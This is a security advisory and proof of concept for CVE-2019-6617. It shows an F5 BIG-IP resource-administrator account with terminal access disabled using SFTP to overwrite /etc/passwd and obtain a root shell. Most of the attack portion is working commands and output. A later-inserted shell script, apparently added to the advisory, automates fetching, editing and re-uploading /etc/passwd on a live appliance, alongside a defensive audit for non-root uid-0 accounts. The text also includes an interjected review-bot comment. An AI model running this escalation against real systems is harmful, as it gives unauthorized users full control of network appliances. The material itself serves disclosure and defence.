Title: F5 BIG-IP Resource Administrator Privilege Escalation
Author: Rich Mirch
CVE: CVE-2019-6617
Vendor Advisory: https://support.f5.com/csp/article/K38941195
Description
An F5 BIG-IP account holding the resource administrator role can still reach
the appliance over SFTP as root even when its terminal access is disabled.
This PoC shows that such an account can use that SFTP access to obtain a root
shell and take full control of the appliance despite terminal access being off.
Technical details
A local account configured with the resource administrator role is created as
a Linux user with uid 0 (root). When terminal access is disabled, SSH logins
for the account are refused, but the SFTP subsystem remains available without
any restriction. Because the account is a Linux root account, it can read and
overwrite any file on the system, including /etc/passwd.
Note: This requires the SSH service to be enabled and the management interface
to be reachable by the attacker.
CVSS
Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C
Base: 7.2
Temporal: 6.9
Test Environment
F5 BIG-IP Virtual Edition 14.0.0.1
[root@bigip14:Active:Standalone] ~ # tmsh show sys version
Sys::Version
Main Package
  Product     BIG-IP
  Version     14.0.0.1
  Build       0.0.2
  Edition     Point Release 1
  Date        Fri Aug 17 16:22:25 PDT 2018
A resource administrator account (resadmin) with the following attributes was used for this PoC.
Note that the shell attribute is set to "none", which is how terminal access is disabled.
[root@bigip14:Active:Standalone] ~ # tmsh list auth user resadmin | grep -v encrypted-password
auth user resadmin {
    description resadmin
    partition Common
    partition-access {
        all-partitions {
            role resource-admin
        }
    }
    shell none
}
Proof Of Concept
[Step 1]
Show that resadmin is not allowed to SSH.
$ ssh resadmin@5.6.7.8
Password:
Last login: Thu Sep 13 15:23:23 2018 from 1.2.3.4
This account is currently not available.
Connection to 5.6.7.8 closed.
[Step 2]
Connect to the appliance as resadmin via SFTP and retrieve the /etc/passwd file.
$ /usr/bin/sftp resadmin@5.6.7.8
Password:
Connected to 5.6.7.8.
sftp> get /etc/passwd
Fetching /etc/passwd to passwd
/etc/passwd 100% 1423 229.8KB/s 00:00
sftp> quit
[Step 3]
Update the local passwd file and change /sbin/nologin to /bin/bash for the resadmin user.
$ perl -p -i.orig -e 's!/sbin/nologin!/bin/bash! if /^resadmin/;' passwd
[Step 4]
Display a diff of the passwd change from step 3.
$ diff -u passwd.orig passwd
--- passwd.orig 2018-09-13 17:32:55.000000000 -0500
+++ passwd 2018-09-13 17:34:36.000000000 -0500
@@ -26,4 +26,4 @@
hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
syscheck:x:199:10::/:/sbin/nologin
restnoded:x:198:198::/:/sbin/nologin
-resadmin:x:0:500:resadmin:/home/resadmin:/sbin/nologin
+resadmin:x:0:500:resadmin:/home/resadmin:/bin/bash
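Review bot: the perl substitution in Step 3 that produced this hunk anchors on `^resadmin` only, so any other account whose name begins with `resadmin` would have its shell rewritten as well; anchoring on the full name field (`^resadmin:`) confines the change to the single line shown here.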
[Step 5]
SFTP as resadmin and upload the modified passwd file to /etc/passwd.
$ /usr/bin/sftp resadmin@5.6.7.8
Password:
Connected to 5.6.7.8.
sftp> cd /etc
sftp> put passwd
Uploading passwd to /etc/passwd
passwd 100% 1419 541.3KB/s 00:00
sftp> quit
[Step 6]
Login as resadmin via SSH and obtain a bash shell running as the root user.
$ ssh resadmin@5.6.7.8
Password:
Last login: Thu Sep 13 15:30:39 2018 from 1.2.3.4
[resadmin@bigip14:Active:Standalone] ~ # echo $SHELL
/bin/bash
[resadmin@bigip14:Active:Standalone] ~ # id
uid=0(root) gid=500(webusers) groups=500(webusers),495(sdm) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
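The following script is an added example and is not code from the original advisory or PoC. It covers the root cause from the Technical details section (a non-root account carrying uid 0) with a small audit function over a passwd file, and wraps Steps 2 through 6 of the procedure above in shell functions. TARGET is assumed from the transcript; the SFTP helpers prompt for the password exactly as the interactive session does and are not invoked by the offline demonstration at the bottom. Unlike the perl one-liner in Step 3, the edit compares the whole name field, so an unrelated account whose name merely starts with "resadmin" is left alone.

```shell
#!/bin/sh
# Added example; not part of the original advisory. Audit for the condition
# described under "Technical details" and automate the PoC steps.

TARGET="resadmin@5.6.7.8"   # assumed; taken from the PoC transcript

# Audit: print every account in passwd file $1 whose uid is 0 but whose name
# is not "root", together with its login shell. A hit whose shell is
# /sbin/nologin is exactly the advisory's case: terminal access off, yet root.
find_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { printf "%s shell=%s\n", $1, $7 }' "$1"
}

# Step 2: download /etc/passwd from the appliance into local file $1.
# sftp reads its commands from stdin; the password prompt still uses the tty.
fetch_passwd() {
    sftp "$TARGET" <<EOF
get /etc/passwd $1
EOF
}

# Steps 3 and 4: set the login-shell field (7th) of user $2 in passwd copy $1
# to $3, keeping $1.orig for the diff. The name field is compared whole, so
# a prefix match such as "^resadmin" catching "resadmin2" cannot happen.
set_login_shell() {
    cp "$1" "$1.orig"
    awk -F: -v OFS=: -v u="$2" -v s="$3" \
        '$1 == u { $7 = s } { print }' "$1.orig" > "$1"
}

# Number of lines that differ between $1.orig and the edited $1.
changed_lines() {
    diff "$1.orig" "$1" | grep -c '^>'
}

# Step 5: upload the edited copy over /etc/passwd. Refuses to upload unless
# exactly one line changed, so a mistaken edit never reaches the appliance.
push_passwd() {
    [ "$(changed_lines "$1")" = "1" ] || {
        echo "refusing upload: unexpected number of changed lines" >&2
        return 1
    }
    sftp "$TARGET" <<EOF
put $1 /etc/passwd
EOF
}

# Offline demonstration on a constructed passwd file (not captured from a
# device). The resadmin line copies the one in the Step 4 diff; resadmin2 is
# made up to show that the exact-match edit leaves it untouched.
DEMO=$(mktemp)
cat > "$DEMO" <<'EOF'
root:x:0:0:root:/root:/bin/bash
syscheck:x:199:10::/:/sbin/nologin
resadmin:x:0:500:resadmin:/home/resadmin:/sbin/nologin
resadmin2:x:501:500:resadmin2:/home/resadmin2:/sbin/nologin
EOF

echo "uid-0 accounts other than root:"
find_uid0_accounts "$DEMO"                      # resadmin shell=/sbin/nologin
set_login_shell "$DEMO" resadmin /bin/bash
echo "lines changed: $(changed_lines "$DEMO")"  # 1
```

Against a live appliance the sequence is `fetch_passwd passwd`, `set_login_shell passwd resadmin /bin/bash`, `push_passwd passwd`, followed by the SSH login of Step 6; the audit function alone is what a defender would run over a copy of /etc/passwd to find any further uid-0 accounts.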
Timeline:
2018-09-13: Reported to vendor
2018-09-14: Vendor confirmed vulnerability
2018-09-26: Vendor requested embargo
2018-12-07: Contacted vendor for update
2019-04-30: Vendor released fix and advisory